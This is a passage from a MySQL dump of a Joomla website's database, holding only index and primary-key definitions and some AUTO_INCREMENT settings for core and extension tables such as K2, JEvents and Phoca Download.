ALTER TABLE `y57u5_content_rating`
  ADD PRIMARY KEY (`content_id`);

--
-- Indexes for table `y57u5_content_types`
--
ALTER TABLE `y57u5_content_types`
  ADD PRIMARY KEY (`type_id`),
  ADD KEY `idx_alias` (`type_alias`(100));

--
-- Indexes for table `y57u5_convertforms`
--
ALTER TABLE `y57u5_convertforms`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_convertforms_campaigns`
--
ALTER TABLE `y57u5_convertforms_campaigns`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_convertforms_conversions`
--
ALTER TABLE `y57u5_convertforms_conversions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `created` (`created`);

--
-- Indexes for table `y57u5_corejoomla_assets`
--
ALTER TABLE `y57u5_corejoomla_assets`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_corejoomla_countries`
--
ALTER TABLE `y57u5_corejoomla_countries`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `idx_corejoomla_countries_uniq` (`country_code`,`language`);

--
-- Indexes for table `y57u5_corejoomla_messagequeue`
--
ALTER TABLE `y57u5_corejoomla_messagequeue`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_corejoomla_message_queue_status` (`status`),
  ADD KEY `idx_corejoomla_message_queue_created` (`created`);

--
-- Indexes for table `y57u5_corejoomla_messages`
--
ALTER TABLE `y57u5_corejoomla_messages`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_corejoomla_rating`
--
ALTER TABLE `y57u5_corejoomla_rating`
  ADD PRIMARY KEY (`item_id`,`asset_id`);

--
-- Indexes for table `y57u5_corejoomla_rating_details`
--
ALTER TABLE `y57u5_corejoomla_rating_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_extensions`
--
ALTER TABLE `y57u5_extensions`
  ADD PRIMARY KEY (`extension_id`),
  ADD KEY `element_clientid` (`element`,`client_id`),
  ADD KEY `element_folder_clientid` (`element`,`folder`,`client_id`),
  ADD KEY `extension` (`type`,`element`,`folder`,`client_id`);

--
-- Indexes for table `y57u5_fields`
--
ALTER TABLE `y57u5_fields`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_checkout` (`checked_out`),
  ADD KEY `idx_state` (`state`),
  ADD KEY `idx_created_user_id` (`created_user_id`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_context` (`context`(191)),
  ADD KEY `idx_language` (`language`);

--
-- Indexes for table `y57u5_fields_categories`
--
ALTER TABLE `y57u5_fields_categories`
  ADD PRIMARY KEY (`field_id`,`category_id`);

--
-- Indexes for table `y57u5_fields_groups`
--
ALTER TABLE `y57u5_fields_groups`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_checkout` (`checked_out`),
  ADD KEY `idx_state` (`state`),
  ADD KEY `idx_created_by` (`created_by`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_context` (`context`(191)),
  ADD KEY `idx_language` (`language`);

--
-- Indexes for table `y57u5_fields_values`
--
ALTER TABLE `y57u5_fields_values`
  ADD KEY `idx_field_id` (`field_id`),
  ADD KEY `idx_item_id` (`item_id`(191));

--
-- Indexes for table `y57u5_finder_filters`
--
ALTER TABLE `y57u5_finder_filters`
  ADD PRIMARY KEY (`filter_id`);

--
-- Indexes for table `y57u5_finder_links`
--
ALTER TABLE `y57u5_finder_links`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `idx_type` (`type_id`),
  ADD KEY `idx_title` (`title`(100)),
  ADD KEY `idx_md5` (`md5sum`),
  ADD KEY `idx_url` (`url`(75)),
  ADD KEY `idx_published_list` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`list_price`),
  ADD KEY `idx_published_sale` (`published`,`state`,`access`,`publish_start_date`,`publish_end_date`,`sale_price`);

--
-- Indexes for table `y57u5_finder_links_terms0`
--
ALTER TABLE `y57u5_finder_links_terms0`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms1`
--
ALTER TABLE `y57u5_finder_links_terms1`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms2`
--
ALTER TABLE `y57u5_finder_links_terms2`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms3`
--
ALTER TABLE `y57u5_finder_links_terms3`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms4`
--
ALTER TABLE `y57u5_finder_links_terms4`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms5`
--
ALTER TABLE `y57u5_finder_links_terms5`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms6`
--
ALTER TABLE `y57u5_finder_links_terms6`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms7`
--
ALTER TABLE `y57u5_finder_links_terms7`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms8`
--
ALTER TABLE `y57u5_finder_links_terms8`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_terms9`
--
ALTER TABLE `y57u5_finder_links_terms9`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_termsa`
--
ALTER TABLE `y57u5_finder_links_termsa`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_termsb`
--
ALTER TABLE `y57u5_finder_links_termsb`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_termsc`
--
ALTER TABLE `y57u5_finder_links_termsc`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_termsd`
--
ALTER TABLE `y57u5_finder_links_termsd`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_termse`
--
ALTER TABLE `y57u5_finder_links_termse`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_links_termsf`
--
ALTER TABLE `y57u5_finder_links_termsf`
  ADD PRIMARY KEY (`link_id`,`term_id`),
  ADD KEY `idx_term_weight` (`term_id`,`weight`),
  ADD KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`);

--
-- Indexes for table `y57u5_finder_taxonomy`
--
ALTER TABLE `y57u5_finder_taxonomy`
  ADD PRIMARY KEY (`id`),
  ADD KEY `parent_id` (`parent_id`),
  ADD KEY `state` (`state`),
  ADD KEY `ordering` (`ordering`),
  ADD KEY `access` (`access`),
  ADD KEY `idx_parent_published` (`parent_id`,`state`,`access`);

--
-- Indexes for table `y57u5_finder_taxonomy_map`
--
ALTER TABLE `y57u5_finder_taxonomy_map`
  ADD PRIMARY KEY (`link_id`,`node_id`),
  ADD KEY `link_id` (`link_id`),
  ADD KEY `node_id` (`node_id`);

--
-- Indexes for table `y57u5_finder_terms`
--
ALTER TABLE `y57u5_finder_terms`
  ADD PRIMARY KEY (`term_id`),
  ADD UNIQUE KEY `idx_term` (`term`),
  ADD KEY `idx_term_phrase` (`term`,`phrase`),
  ADD KEY `idx_stem_phrase` (`stem`,`phrase`),
  ADD KEY `idx_soundex_phrase` (`soundex`,`phrase`);

--
-- Indexes for table `y57u5_finder_terms_common`
--
ALTER TABLE `y57u5_finder_terms_common`
  ADD KEY `idx_word_lang` (`term`,`language`),
  ADD KEY `idx_lang` (`language`);

--
-- Indexes for table `y57u5_finder_tokens`
--
ALTER TABLE `y57u5_finder_tokens`
  ADD KEY `idx_word` (`term`),
  ADD KEY `idx_context` (`context`);

--
-- Indexes for table `y57u5_finder_tokens_aggregate`
--
ALTER TABLE `y57u5_finder_tokens_aggregate`
  ADD KEY `token` (`term`),
  ADD KEY `keyword_id` (`term_id`);

--
-- Indexes for table `y57u5_finder_types`
--
ALTER TABLE `y57u5_finder_types`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `title` (`title`);

--
-- Indexes for table `y57u5_jevents_categories`
--
ALTER TABLE `y57u5_jevents_categories`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_jevents_catmap`
--
ALTER TABLE `y57u5_jevents_catmap`
  ADD UNIQUE KEY `key_event_category` (`evid`,`catid`),
  ADD KEY `key_evid` (`evid`);

--
-- Indexes for table `y57u5_jevents_exception`
--
ALTER TABLE `y57u5_jevents_exception`
  ADD PRIMARY KEY (`ex_id`),
  ADD KEY `eventid` (`eventid`),
  ADD KEY `rp_id` (`rp_id`);

--
-- Indexes for table `y57u5_jevents_filtermap`
--
ALTER TABLE `y57u5_jevents_filtermap`
  ADD PRIMARY KEY (`fid`),
  ADD KEY `md5` (`md5`);

--
-- Indexes for table `y57u5_jevents_icsfile`
--
ALTER TABLE `y57u5_jevents_icsfile`
  ADD PRIMARY KEY (`ics_id`),
  ADD UNIQUE KEY `label` (`label`),
  ADD KEY `stateidx` (`state`);

--
-- Indexes for table `y57u5_jevents_repbyday`
--
ALTER TABLE `y57u5_jevents_repbyday`
  ADD KEY `rptday` (`rptday`),
  ADD KEY `daycat` (`rptday`,`catid`);

--
-- Indexes for table `y57u5_jevents_repetition`
--
ALTER TABLE `y57u5_jevents_repetition`
  ADD PRIMARY KEY (`rp_id`),
  ADD UNIQUE KEY `duplicatecheck` (`duplicatecheck`),
  ADD KEY `eventid` (`eventid`),
  ADD KEY `eventstart` (`eventid`,`startrepeat`),
  ADD KEY `eventend` (`eventid`,`endrepeat`),
  ADD KEY `eventdetail` (`eventdetail_id`),
  ADD KEY `startrepeat` (`startrepeat`),
  ADD KEY `startend` (`startrepeat`,`endrepeat`),
  ADD KEY `endrepeat` (`endrepeat`);

--
-- Indexes for table `y57u5_jevents_rrule`
--
ALTER TABLE `y57u5_jevents_rrule`
  ADD PRIMARY KEY (`rr_id`),
  ADD KEY `eventid` (`eventid`);

--
-- Indexes for table `y57u5_jevents_translation`
--
ALTER TABLE `y57u5_jevents_translation`
  ADD PRIMARY KEY (`translation_id`),
  ADD KEY `evdet_id` (`evdet_id`),
  ADD KEY `langdetail` (`evdet_id`,`language`);

--
-- Indexes for table `y57u5_jevents_vevdetail`
--
ALTER TABLE `y57u5_jevents_vevdetail`
  ADD PRIMARY KEY (`evdet_id`),
  ADD KEY `loc_id` (`loc_id`),
  ADD KEY `location` (`location`),
  ADD KEY `multiday` (`multiday`);
ALTER TABLE `y57u5_jevents_vevdetail` ADD FULLTEXT KEY `searchIdx` (`summary`,`description`);

--
-- Indexes for table `y57u5_jevents_vevent`
--
ALTER TABLE `y57u5_jevents_vevent`
  ADD PRIMARY KEY (`ev_id`),
  ADD KEY `icsid` (`icsid`),
  ADD KEY `stateidx` (`state`),
  ADD KEY `evaccess` (`access`);

--
-- Indexes for table `y57u5_jev_defaults`
--
ALTER TABLE `y57u5_jev_defaults`
  ADD PRIMARY KEY (`id`),
  ADD KEY `name` (`name`),
  ADD KEY `langcodename` (`language`,`catid`,`name`);

--
-- Indexes for table `y57u5_jev_users`
--
ALTER TABLE `y57u5_jev_users`
  ADD PRIMARY KEY (`id`),
  ADD KEY `user` (`user_id`);

--
-- Indexes for table `y57u5_jlexblock`
--
ALTER TABLE `y57u5_jlexblock`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_joomailermailchimpintegration`
--
ALTER TABLE `y57u5_joomailermailchimpintegration`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `useridListidEmail` (`userid`,`listid`,`email`);

--
-- Indexes for table `y57u5_joomailermailchimpintegration_campaigns`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_campaigns`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_joomailermailchimpintegration_crm`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_crm`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_joomailermailchimpintegration_crm_users`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_crm_users`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_joomailermailchimpintegration_custom_fields`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_custom_fields`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_joomailermailchimpintegration_misc`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_misc`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_joomailermailchimpintegration_signup`
--
ALTER TABLE `y57u5_joomailermailchimpintegration_signup`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_jumi`
--
ALTER TABLE `y57u5_jumi`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `id` (`id`);

--
-- Indexes for table `y57u5_k2_attachments`
--
ALTER TABLE `y57u5_k2_attachments`
  ADD PRIMARY KEY (`id`),
  ADD KEY `itemID` (`itemID`);

--
-- Indexes for table `y57u5_k2_categories`
--
ALTER TABLE `y57u5_k2_categories`
  ADD PRIMARY KEY (`id`),
  ADD KEY `category` (`published`,`access`,`trash`),
  ADD KEY `parent` (`parent`),
  ADD KEY `ordering` (`ordering`),
  ADD KEY `published` (`published`),
  ADD KEY `access` (`access`),
  ADD KEY `trash` (`trash`),
  ADD KEY `language` (`language`);

--
-- Indexes for table `y57u5_k2_comments`
--
ALTER TABLE `y57u5_k2_comments`
  ADD PRIMARY KEY (`id`),
  ADD KEY `itemID` (`itemID`),
  ADD KEY `userID` (`userID`),
  ADD KEY `published` (`published`),
  ADD KEY `latestComments` (`published`,`commentDate`),
  ADD KEY `countComments` (`itemID`,`published`);

--
-- Indexes for table `y57u5_k2_extra_fields`
--
ALTER TABLE `y57u5_k2_extra_fields`
  ADD PRIMARY KEY (`id`),
  ADD KEY `group` (`group`),
  ADD KEY `published` (`published`),
  ADD KEY `ordering` (`ordering`);

--
-- Indexes for table `y57u5_k2_extra_fields_groups`
--
ALTER TABLE `y57u5_k2_extra_fields_groups`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_k2_items`
--
ALTER TABLE `y57u5_k2_items`
  ADD PRIMARY KEY (`id`),
  ADD KEY `item` (`published`,`publish_up`,`publish_down`,`trash`,`access`),
  ADD KEY `catid` (`catid`),
  ADD KEY `created_by` (`created_by`),
  ADD KEY `ordering` (`ordering`),
  ADD KEY `featured` (`featured`),
  ADD KEY `featured_ordering` (`featured_ordering`),
  ADD KEY `hits` (`hits`),
  ADD KEY `created` (`created`),
  ADD KEY `language` (`language`);
ALTER TABLE `y57u5_k2_items` ADD FULLTEXT KEY `search` (`title`,`introtext`,`fulltext`,`extra_fields_search`,`image_caption`,`image_credits`,`video_caption`,`video_credits`,`metadesc`,`metakey`);
ALTER TABLE `y57u5_k2_items` ADD FULLTEXT KEY `title` (`title`);

--
-- Indexes for table `y57u5_k2_rating`
--
ALTER TABLE `y57u5_k2_rating`
  ADD PRIMARY KEY (`itemID`);

--
-- Indexes for table `y57u5_k2_tags`
--
ALTER TABLE `y57u5_k2_tags`
  ADD PRIMARY KEY (`id`),
  ADD KEY `published` (`published`);
ALTER TABLE `y57u5_k2_tags` ADD FULLTEXT KEY `name` (`name`);

--
-- Indexes for table `y57u5_k2_tags_xref`
--
ALTER TABLE `y57u5_k2_tags_xref`
  ADD PRIMARY KEY (`id`),
  ADD KEY `tagID` (`tagID`),
  ADD KEY `itemID` (`itemID`);

--
-- Indexes for table `y57u5_k2_users`
--
ALTER TABLE `y57u5_k2_users`
  ADD PRIMARY KEY (`id`),
  ADD KEY `userID` (`userID`),
  ADD KEY `group` (`group`);

--
-- Indexes for table `y57u5_k2_user_groups`
--
ALTER TABLE `y57u5_k2_user_groups`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_languages`
--
ALTER TABLE `y57u5_languages`
  ADD PRIMARY KEY (`lang_id`),
  ADD UNIQUE KEY `idx_sef` (`sef`),
  ADD UNIQUE KEY `idx_langcode` (`lang_code`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_ordering` (`ordering`);

--
-- Indexes for table `y57u5_menu`
--
ALTER TABLE `y57u5_menu`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`(100),`language`),
  ADD KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`),
  ADD KEY `idx_menutype` (`menutype`),
  ADD KEY `idx_left_right` (`lft`,`rgt`),
  ADD KEY `idx_language` (`language`),
  ADD KEY `idx_alias` (`alias`(100)),
  ADD KEY `idx_path` (`path`(100));

--
-- Indexes for table `y57u5_menu_types`
--
ALTER TABLE `y57u5_menu_types`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `idx_menutype` (`menutype`);

--
-- Indexes for table `y57u5_messages`
--
ALTER TABLE `y57u5_messages`
  ADD PRIMARY KEY (`message_id`),
  ADD KEY `useridto_state` (`user_id_to`,`state`);

--
-- Indexes for table `y57u5_messages_cfg`
--
ALTER TABLE `y57u5_messages_cfg`
  ADD UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`);

--
-- Indexes for table `y57u5_modules`
--
ALTER TABLE `y57u5_modules`
  ADD PRIMARY KEY (`id`),
  ADD KEY `published` (`published`,`access`),
  ADD KEY `newsfeeds` (`module`,`published`),
  ADD KEY `idx_language` (`language`);

--
-- Indexes for table `y57u5_modules_menu`
--
ALTER TABLE `y57u5_modules_menu`
  ADD PRIMARY KEY (`moduleid`,`menuid`);

--
-- Indexes for table `y57u5_newsfeeds`
--
ALTER TABLE `y57u5_newsfeeds`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_checkout` (`checked_out`),
  ADD KEY `idx_state` (`published`),
  ADD KEY `idx_catid` (`catid`),
  ADD KEY `idx_createdby` (`created_by`),
  ADD KEY `idx_language` (`language`),
  ADD KEY `idx_xreference` (`xreference`);

--
-- Indexes for table `y57u5_overrider`
--
ALTER TABLE `y57u5_overrider`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_phocadownload`
--
ALTER TABLE `y57u5_phocadownload`
  ADD PRIMARY KEY (`id`),
  ADD KEY `catid` (`catid`,`published`);

--
-- Indexes for table `y57u5_phocadownload_categories`
--
ALTER TABLE `y57u5_phocadownload_categories`
  ADD PRIMARY KEY (`id`),
  ADD KEY `cat_idx` (`section`,`published`,`access`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_checkout` (`checked_out`);

--
-- Indexes for table `y57u5_phocadownload_file_votes`
--
ALTER TABLE `y57u5_phocadownload_file_votes`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_phocadownload_file_votes_statistics`
--
ALTER TABLE `y57u5_phocadownload_file_votes_statistics`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_phocadownload_layout`
--
ALTER TABLE `y57u5_phocadownload_layout`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_phocadownload_licenses`
--
ALTER TABLE `y57u5_phocadownload_licenses`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_phocadownload_logging`
--
ALTER TABLE `y57u5_phocadownload_logging`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_phocadownload_styles`
--
ALTER TABLE `y57u5_phocadownload_styles`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_phocadownload_tags`
--
ALTER TABLE `y57u5_phocadownload_tags`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_phocadownload_tags_ref`
--
ALTER TABLE `y57u5_phocadownload_tags_ref`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `id` (`id`),
  ADD UNIQUE KEY `i_fileid` (`fileid`,`tagid`);

--
-- Indexes for table `y57u5_phocadownload_user_stat`
--
ALTER TABLE `y57u5_phocadownload_user_stat`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_postinstall_messages`
--
ALTER TABLE `y57u5_postinstall_messages`
  ADD PRIMARY KEY (`postinstall_message_id`);

--
-- Indexes for table `y57u5_privacy_consents`
--
ALTER TABLE `y57u5_privacy_consents`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_user_id` (`user_id`);

--
-- Indexes for table `y57u5_privacy_requests`
--
ALTER TABLE `y57u5_privacy_requests`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_redirect_links`
--
ALTER TABLE `y57u5_redirect_links`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_old_url` (`old_url`(100)),
  ADD KEY `idx_link_modifed` (`modified_date`);

--
-- Indexes for table `y57u5_rokcandy`
--
ALTER TABLE `y57u5_rokcandy`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_rokcommon_configs`
--
ALTER TABLE `y57u5_rokcommon_configs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_roksprocket_items`
--
ALTER TABLE `y57u5_roksprocket_items`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_module` (`module_id`),
  ADD KEY `idx_module_order` (`module_id`,`order`);

--
-- Indexes for table `y57u5_rstbox`
--
ALTER TABLE `y57u5_rstbox`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_rstbox_logs`
--
ALTER TABLE `y57u5_rstbox_logs`
  ADD PRIMARY KEY (`id`),
  ADD KEY `visitorid` (`visitorid`),
  ADD KEY `box` (`box`),
  ADD KEY `sessionid` (`sessionid`),
  ADD KEY `date` (`date`);

--
-- Indexes for table `y57u5_schemas`
--
ALTER TABLE `y57u5_schemas`
  ADD PRIMARY KEY (`extension_id`,`version_id`);

--
-- Indexes for table `y57u5_session`
--
ALTER TABLE `y57u5_session`
  ADD PRIMARY KEY (`session_id`),
  ADD KEY `userid` (`userid`),
  ADD KEY `time` (`time`),
  ADD KEY `client_id_guest` (`client_id`,`guest`);

--
-- Indexes for table `y57u5_sj_newsletter_email`
--
ALTER TABLE `y57u5_sj_newsletter_email`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_sj_newsletter_email_content`
--
ALTER TABLE `y57u5_sj_newsletter_email_content`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_sj_newsletter_email_content_id`
--
ALTER TABLE `y57u5_sj_newsletter_email_content_id`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_tags`
--
ALTER TABLE `y57u5_tags`
  ADD PRIMARY KEY (`id`),
  ADD KEY `tag_idx` (`published`,`access`),
  ADD KEY `idx_access` (`access`),
  ADD KEY `idx_checkout` (`checked_out`),
  ADD KEY `idx_left_right` (`lft`,`rgt`),
  ADD KEY `idx_language` (`language`),
  ADD KEY `idx_path` (`path`(100)),
  ADD KEY `idx_alias` (`alias`(100));

--
-- Indexes for table `y57u5_template_styles`
--
ALTER TABLE `y57u5_template_styles`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_template` (`template`),
  ADD KEY `idx_home` (`home`);

--
-- Indexes for table `y57u5_ucm_base`
--
ALTER TABLE `y57u5_ucm_base`
  ADD PRIMARY KEY (`ucm_id`),
  ADD KEY `idx_ucm_item_id` (`ucm_item_id`),
  ADD KEY `idx_ucm_type_id` (`ucm_type_id`),
  ADD KEY `idx_ucm_language_id` (`ucm_language_id`);

--
-- Indexes for table `y57u5_ucm_content`
--
ALTER TABLE `y57u5_ucm_content`
  ADD PRIMARY KEY (`core_content_id`),
  ADD KEY `tag_idx` (`core_state`,`core_access`),
  ADD KEY `idx_access` (`core_access`),
  ADD KEY `idx_alias` (`core_alias`(100)),
  ADD KEY `idx_language` (`core_language`),
  ADD KEY `idx_title` (`core_title`(100)),
  ADD KEY `idx_modified_time` (`core_modified_time`),
  ADD KEY `idx_created_time` (`core_created_time`),
  ADD KEY `idx_content_type` (`core_type_alias`(100)),
  ADD KEY `idx_core_modified_user_id` (`core_modified_user_id`),
  ADD KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`),
  ADD KEY `idx_core_created_user_id` (`core_created_user_id`),
  ADD KEY `idx_core_type_id` (`core_type_id`);

--
-- Indexes for table `y57u5_ucm_history`
--
ALTER TABLE `y57u5_ucm_history`
  ADD PRIMARY KEY (`version_id`),
  ADD KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`),
  ADD KEY `idx_save_date` (`save_date`);

--
-- Indexes for table `y57u5_updates`
--
ALTER TABLE `y57u5_updates`
  ADD PRIMARY KEY (`update_id`);

--
-- Indexes for table `y57u5_update_sites`
--
ALTER TABLE `y57u5_update_sites`
  ADD PRIMARY KEY (`update_site_id`);

--
-- Indexes for table `y57u5_update_sites_extensions`
--
ALTER TABLE `y57u5_update_sites_extensions`
  ADD PRIMARY KEY (`update_site_id`,`extension_id`);

--
-- Indexes for table `y57u5_usergroups`
--
ALTER TABLE `y57u5_usergroups`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`),
  ADD KEY `idx_usergroup_title_lookup` (`title`),
  ADD KEY `idx_usergroup_adjacency_lookup` (`parent_id`),
  ADD KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`) USING BTREE;

--
-- Indexes for table `y57u5_users`
--
ALTER TABLE `y57u5_users`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_name` (`name`(100)),
  ADD KEY `idx_block` (`block`),
  ADD KEY `username` (`username`),
  ADD KEY `email` (`email`);

--
-- Indexes for table `y57u5_user_keys`
--
ALTER TABLE `y57u5_user_keys`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `series` (`series`),
  ADD KEY `user_id` (`user_id`);

--
-- Indexes for table `y57u5_user_notes`
--
ALTER TABLE `y57u5_user_notes`
  ADD PRIMARY KEY (`id`),
  ADD KEY `idx_user_id` (`user_id`),
  ADD KEY `idx_category_id` (`catid`);

--
-- Indexes for table `y57u5_user_profiles`
--
ALTER TABLE `y57u5_user_profiles`
  ADD UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`);

--
-- Indexes for table `y57u5_user_usergroup_map`
--
ALTER TABLE `y57u5_user_usergroup_map`
  ADD PRIMARY KEY (`user_id`,`group_id`);

--
-- Indexes for table `y57u5_viewlevels`
--
ALTER TABLE `y57u5_viewlevels`
  ADD PRIMARY KEY (`id`),
  ADD UNIQUE KEY `idx_assetgroup_title_lookup` (`title`);

--
-- Indexes for table `y57u5_wf_profiles`
--
ALTER TABLE `y57u5_wf_profiles`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `y57u5_widgetkit_widget`
--
ALTER TABLE `y57u5_widgetkit_widget`
  ADD PRIMARY KEY (`id`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `y57u5_action_logs`
--
ALTER TABLE `y57u5_action_logs`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `y57u5_action_logs_extensions`
--
ALTER TABLE `y57u5_action_logs_extensions`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=19;

--
-- AUTO_INCREMENT for table `y57u5_action_log_config`
--
ALTER TABLE `y57u5_action_log_config`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=20;

--
-- AUTO_INCREMENT for table `y57u5_assets`
--
ALTER TABLE `y57u5_assets`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', AUTO_INCREMENT=397;

--
-- AUTO_INCREMENT for table `y57u5_banners`
--
